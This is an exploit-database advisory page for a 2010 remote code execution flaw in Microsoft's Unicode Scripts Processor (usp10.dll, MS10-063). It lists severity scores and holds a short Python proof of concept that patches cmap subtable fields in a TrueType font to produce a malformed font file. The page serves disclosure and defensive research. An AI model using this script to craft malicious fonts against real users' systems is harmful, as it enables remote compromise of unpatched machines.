Microsoft Unicode Scripts Processor Remote Code Execution

2010-10-05 / 2010-10-06
Credit: Abysssec
Risk: High
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

''' __ __ ____ _ _ ____ | \/ |/ __ \ /\ | | | | _ \ | \ / | | | | / \ | | | | |_) | | |\/| | | | |/ /\ \| | | | _ < (Final Binary Analysis) | | | | |__| / ____ \ |__| | |_) | |_| |_|\____/_/ \_\____/|____/ ''' ''' Title : Microsoft Unicode Scripts Processor Remote Code Execution Version : usp10.dll XP , Vista Analysis : http://www.abysssec.com Vendor : http://www.microsoft.com Impact : Critical Contact : shahin [at] abysssec.com , info [at] abysssec.com Twitter : @abysssec CVE : CVE-2010-2738 MOAUB Number : MOAUB-FINAL http://www.exploit-db.com/moaub-30-microsoft-unicode-scripts-processor-remote-code-execution-ms10-063/ http://www.exploit-db.com/sploits/moaub-30-PoC.zip ''' import sys import struct def main(): try: fdR = open('src.ttf', 'rb+') strTotal = fdR.read() str1 = strTotal[:18316] nGroups = '\x00\x00\x00\xDC' # nGroups field from Format 12 subtable of cmap table startCharCode = '\x00\xE5\xF7\x20' # startCharCode field from a Group Structure endCharCode = '\x00\xE5\xF7\xFE' # endCharCode field from a Group Structure str2 = strTotal[18328:] fdW= open('FreeSans.ttf', 'wb+') fdW.write(str1) fdW.write(nGroups) fdW.write(startCharCode) fdW.write(endCharCode) fdW.write(str2) fdW.close() fdR.close() print '[-] Font file generated' except IOError: print '[*] Error : An IO error has occurred' print '[-] Exiting ...' sys.exit(-1) if __name__ == '__main__': main()

References:

http://www.microsoft.com/technet/security/Bulletin/MS10-063.mspx


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top